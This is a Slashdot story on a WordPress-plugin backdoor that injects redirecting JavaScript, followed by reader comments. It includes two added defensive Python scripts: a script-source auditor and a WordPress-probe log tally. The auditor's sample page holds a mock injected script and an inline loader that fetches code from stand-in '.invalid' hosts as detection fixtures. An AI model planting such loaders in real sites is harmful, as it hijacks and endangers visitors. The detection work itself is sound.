Hundreds of WordPress Sites Infected By Recently Discovered Backdoor (arstechnica.com)
Malware that exploits unpatched vulnerabilities in 30 different WordPress plugins has infected hundreds if not thousands of sites and may have been in active use for years, according to a writeup published last week. Ars Technica reports: The Linux-based malware installs a backdoor that causes infected sites to redirect visitors to malicious sites, researchers from security firm Dr.Web said. It's also able to disable event logging, go into standby mode, and shut itself down. It gets installed by exploiting already-patched vulnerabilities in plugins that website owners use to add functionality like live chat or metrics-reporting to the core WordPress content management system. "If sites use outdated versions of such add-ons, lacking crucial fixes, the targeted web pages are injected with malicious JavaScripts," Dr.Web researchers wrote. "As a result, when users click on any area of an attacked page, they are redirected to other sites."
Searches such as this one indicate that more than 1,300 sites contain the JavaScript that powers the backdoor. It's possible that some of those sites have removed the malicious code since the last scan. Still, it provides an indication of the reach of the malware. "If one or more vulnerabilities are successfully exploited, the targeted page is injected with a malicious JavaScript that is downloaded from a remote server," the Dr.Web writeup explained. "With that, the injection is done in such a way that when the infected page is loaded, this JavaScript will be initiated first -- regardless of the original contents of the page. At this point, whenever users click anywhere on the infected page, they will be transferred to the website the attackers need users to go to." The researchers found two versions of the backdoor: Linux.BackDoor.WordPressExploit.1 and Linux.BackDoor.WordPressExploit.2. They said the malware may have been in use for three years.
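The summary describes the infection's observable footprint: a script downloaded from a remote server, injected so that it runs before the page's own content, and redirecting on any click. The following is an added defender-side check, not code from Dr.Web, Ars Technica or the WordPress project. It parses a page's HTML with the standard library, lists every `<script>` that loads from, or dynamically references, a host outside an allowlist, and notes whether that script sits in `<head>` and whether it is the first script on the page. The allowlist, the `.invalid` hostnames and the sample page are constructed for illustration; a real deployment would seed the allowlist from the site's own theme and plugin CDNs.

```python
"""Flag script sources a WordPress page loads from hosts it should not.

Added example (not from the article or from WordPress). Heuristic only:
it reports external <script src=...> tags and URLs inside inline scripts
whose host is not on the site's allowlist, with position information,
because the injected loader described in the writeup runs first and
fetches from a remote server.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: hosts this particular site legitimately loads
# scripts from. Same-origin (relative) sources are always accepted.
ALLOWED_SCRIPT_HOSTS = {"example-blog.test", "cdn.example-blog.test"}

# Absolute and protocol-relative URLs that may appear inside inline scripts
# (e.g. a loader doing s.src='https://host/x.js').
URL_RE = re.compile(r"""https?://[^\s'"<>]+|//[^\s'"<>/]+/[^\s'"<>]*""")


class ScriptAuditor(HTMLParser):
    """Collects external script sources and URLs referenced by inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []      # (script_order, src, in_head)
        self.inline_urls = []   # (script_order, url, in_head)
        self._in_head = False
        self._in_script = False
        self._order = -1        # index of the current <script> in document order

    def handle_starttag(self, tag, attrs):
        if tag == "head":
            self._in_head = True
        elif tag == "script":
            self._order += 1
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.external.append((self._order, src, self._in_head))

    def handle_endtag(self, tag):
        if tag == "head":
            self._in_head = False
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data as raw text.
        if self._in_script:
            for url in URL_RE.findall(data):
                self.inline_urls.append((self._order, url, self._in_head))


def audit_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return findings for scripts that load from hosts outside the allowlist.

    runs_first marks the very first <script> on the page, the position the
    writeup says the injected JavaScript occupies.
    """
    parser = ScriptAuditor()
    parser.feed(html)
    parser.close()
    findings = []
    for kind, entries in (("external", parser.external),
                          ("inline-loader", parser.inline_urls)):
        for order, url, in_head in entries:
            host = urlparse(url).hostname
            if host is None or host in allowed_hosts:
                continue  # relative path or known host: not a finding
            findings.append({"kind": kind, "url": url, "host": host,
                             "in_head": in_head, "runs_first": order == 0})
    return findings


# Constructed sample page: one foreign script placed first in <head>, two
# legitimate ones, and an inline loader that pulls another foreign script.
SAMPLE_PAGE = """<!doctype html>
<html><head>
<script src="//static-redirect.invalid/inject.js"></script>
<title>Example blog</title>
<script src="https://cdn.example-blog.test/theme.js"></script>
</head><body><p>Hello</p>
<script src="https://example-blog.test/wp-includes/js/jquery.js"></script>
<script>var s=document.createElement('script');s.src='https://loader.invalid/a.js';document.head.appendChild(s);</script>
</body></html>"""

if __name__ == "__main__":
    for finding in audit_scripts(SAMPLE_PAGE):
        print(finding)
```

Run it against a page fetched with your usual HTTP client; the two findings on the sample are the head-first `static-redirect.invalid` script and the `loader.invalid` URL inside the inline loader. Because it is a static check, it will not see scripts injected at request time by server-side code, so it complements, rather than replaces, updating the vulnerable plugins.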
Everybody Panic Now! *dancy tune* (Score:1)
"HUNDREDS IF NOT THOUSANDS" is still a drop in a bucket for wordpress.
But don't let that stop the calls for all of us to RUN AROUND, SCREAM AND SHOUT!!!1!
Funny how wordpress is built upon an interpreted language with a devoted following of apologists and yet somehow wordpress installations keep on springing leaks. Even if the total numbers of affected sites per plugin are low. "Hundreds if not thousands of sites" took 30 different plugins this time. Methinks the sheer number of plugins available for wordp
Re: (Score:3)
Anyways, back in the real world, the very large WP site I manage doesn't use any of these plugins; we update all of our plugins weekly with every patch, and have no issues.
Re: (Score:2)
THIS! It's not like it's hard to keep the plugins up to date.
Re: (Score:3, Insightful)
Assuming your plugins get updated.
Re: (Score:3)
It's right in the summary, all of the relevant plugins have updates that fix the vulnerability.
Re: (Score:2)
Re: (Score:2)
It's very easy to keep a site stable with no traffic.
Re:Everybody Panic Now! *dancy tune* (Score:4, Insightful)
That can be said of pretty much everything: drills, batteries, knives, saws, cars, trucks, stoves, walking, running, hiking, phones, computers, engines, electricity, ladders, ropes, ... getting the point?
Much of life is compromise. It's been around for a long time, and sadly like most software it's had its growing pains and bugs. If WordPress was so bad it would go the way of Windows Vista.
I've been admin for some WordPress sites for about 15 years. The _only_ bug I've ever seen is some kind of "trackback" or something similar where every now and then a spam comment will show up in the queue for posting.
There are so many themes and plugins available. Many great tools that give site designers great creative power and flexibility. I'm not an artist so someone will ask me to install a theme or plugin, which is super easy, and they can do their thing and I do what I'm better at.
Easy fix (Score:3)
Disable JavaScript.
Re: (Score:2)
Right, easy! As long as you're literally the *only* user of the web site.
Re: (Score:3)
Slashdot seems to work pretty well without JavaScript. And I'm pretty sure I'm not the only user here.
Re: (Score:2)
What does that have to do with WordPress back doors? Just because YOU disable JavaScript, doesn't mean the back-door abusers will disable JavaScript.
Re: (Score:2)
Disable JavaScript.
That's what I said in my very first post here 25-ish years ago. I still say it, and try to disable javascript as much as possible.
I don't hate the idea of client-side processing, but imho it's way overused, ends up increasing network traffic, rather than reducing it.
For sure one great use of javascript is where you want to update something on a page without reloading the entire page.
Use cases like that are great. But looking at what's being done, (ever look at a "wix" site's source? you might puke), and
The bots are constantly scanning for WP (Score:5, Informative)
My .NET website regularly gets hit with requests to URLs like /wp-admin and /wp-content and other WordPress paths. Since it's a .NET site, these always return 404.
If my little-known site gets hit by these crawlers, it's hard to imagine how many times bigger sites are bombarded.
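The probing described in the post above (requests for /wp-admin, /wp-content and similar paths against a site that does not run WordPress) is easy to measure from the access log. The script below is an added example, not the poster's code: it parses lines in the common "combined" log format, tallies WordPress-path probes per client, and separately counts probes that did not return 404, which on a non-WordPress site would be worth a closer look. The path list adds a few other well-known WordPress entry points to the two named in the post; the log lines are constructed samples using documentation IP ranges.

```python
"""Tally WordPress-probe requests per client from an access log.

Added example, not from the original post. Assumes Apache/nginx "combined"
log format; other formats need a different LOG_RE.
"""
import re
from collections import defaultdict

# Paths the post mentions (/wp-admin, /wp-content) plus other well-known
# WordPress entry points that scanners commonly request.
WP_PROBE_PATHS = ("/wp-admin", "/wp-content", "/wp-includes",
                  "/wp-login.php", "/xmlrpc.php")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def is_wp_probe(path):
    """True when the request path (query string ignored) targets WordPress."""
    bare = path.split("?", 1)[0]
    return any(bare == p or bare.startswith(p + "/") or bare.startswith(p)
               for p in WP_PROBE_PATHS)


def summarize_probes(lines):
    """Return {client_ip: {"probes": n, "paths": [...], "not_404": n}}.

    Lines that do not match LOG_RE are skipped rather than raising, since
    real logs contain malformed requests from the very scanners of interest.
    """
    summary = defaultdict(lambda: {"probes": 0, "paths": set(), "not_404": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_wp_probe(m["path"]):
            continue
        entry = summary[m["ip"]]
        entry["probes"] += 1
        entry["paths"].add(m["path"].split("?", 1)[0])
        if m["status"] != "404":
            # On a site without WordPress every probe should 404; anything
            # else means something answered and deserves a look.
            entry["not_404"] += 1
    return {ip: {"probes": e["probes"], "paths": sorted(e["paths"]),
                 "not_404": e["not_404"]} for ip, e in summary.items()}


def top_probers(summary, limit=10):
    """Clients ordered by probe count, busiest first."""
    return sorted(summary.items(), key=lambda kv: kv[1]["probes"], reverse=True)[:limit]


# Constructed sample log (documentation IP ranges, fictional timestamps).
SAMPLE_LOG = """\
203.0.113.7 - - [02/Jan/2023:10:00:01 +0000] "GET /wp-admin/ HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Jan/2023:10:00:02 +0000] "GET /wp-login.php HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Jan/2023:10:00:03 +0000] "POST /xmlrpc.php HTTP/1.1" 404 153 "-" "python-requests/2.28"
198.51.100.9 - - [02/Jan/2023:10:05:00 +0000] "GET /products HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Jan/2023:10:05:01 +0000] "GET /wp-content/plugins/foo/readme.txt HTTP/1.1" 404 153 "-" "Mozilla/5.0"
192.0.2.5 - - [02/Jan/2023:10:07:00 +0000] "GET /wp-admin/?q=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
this line is garbage and should be skipped
"""

if __name__ == "__main__":
    for ip, entry in top_probers(summarize_probes(SAMPLE_LOG.splitlines())):
        print(ip, entry)
```

Feed it `summarize_probes(open("access.log"))` to run over a real log. The `not_404` counter is the interesting column: a steady stream of 404s is background noise, while a probe that gets a 200 or 301 from a non-WordPress host means a path that exists where nothing should.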
Re: (Score:2)
It is probably just complete IPv4 scans, so you get the same as everybody. They are not hard to do. I simulated that about 15 years back and came up with something like 10 days. With faster last-mile speeds, the number had gone down. BTW, IPv6 only partially prevents this, it depends on how your IP is chosen from the range you get.
I Ditched Wordpress (Score:5, Interesting)
I found a theme that installed a cronjob. I immediately ditched Wordpress. You don't have to worry about malicious plugins with a static site.
Re: (Score:2)
Re: (Score:2)
I'm aware of those scripts. This was not one of them. Wordpress cronjobs don't encrypt their contents and call sketchy looking servers.
Re: (Score:2)
As noted above, I've been admin for a few WordPress sites and I just double-checked, no WordPress cron jobs.
Do you know any names?
cron.daily, weekly, monthly, ??
Re: (Score:2)
Not trying to make excuses, but on my installs, WP wouldn't be able to set a cron because it doesn't have permissions.
OMG, 0.00000001% of WP sites ... (Score:4, Insightful)
... backdoored by some n00by plugin built by someone who shouldn't be let near a keyboard, let alone a public repo.
We're all gonna die! ...
There is an epic army of people guarding and maintaining the WP ecosystem that has an installbase that dwarfs anything else. Conservative estimates clock 40+ million active installations of WP. Roughly a third of the web. Entire global package filter networks are built around tracking and shutting down WP exploits - which, btw, are actually very rare. Way more rare than some "professional" enterprise behemoth with a meager base of a few thousand installations.
Bottom line:
Everyone Chill. These exploits surface and are communicated so quickly precisely because there are a hundred thousand eyes observing.
Re: (Score:2)
While I agree with your advice to everyone to "chill out", and may have misread the intent of your post as it is early and I have yet to have any coffee, I would like to point out a tiny fact that you seem to have overlooked.
From the summary:
They said the malware may have been in use for three years.
So in this case your claim that
These exploits surface and are communicated so quickly precisely because there are a hundred thousand eyes observing.
is in this case wrong as the
"...epic army of people guarding and maintaining the WP ecosystem ..."
failed in their task of guarding the WP ecosystem
My website also infected (Score:1)
https://clavick.com/convention... [clavick.com]
Split WP in half? (Score:3)
It feels to me like there's something to be said for splitting WP in half. One half does the rendering, the other half does the admin. That way, plugins also get split in half, and the dangerous half (that's got its butt hanging out in the wild) might well mess up rendering, but can't install a botnet or modify the content itself.
WC is on the list. Only 100s infected? (Score:2)
Malware targets 32-bit versions of Linux (Score:1)
Hundreds = Slashdot post = PAGE VIEWS!!! (Score:2)
Anything goes for the front page these days. If someone successfully gets a cat video on the front page, we can just call it quits.
KISS (keep it simple stupid).... (Score:2)
The more complicated you make something, the easier it is to break ...every single time.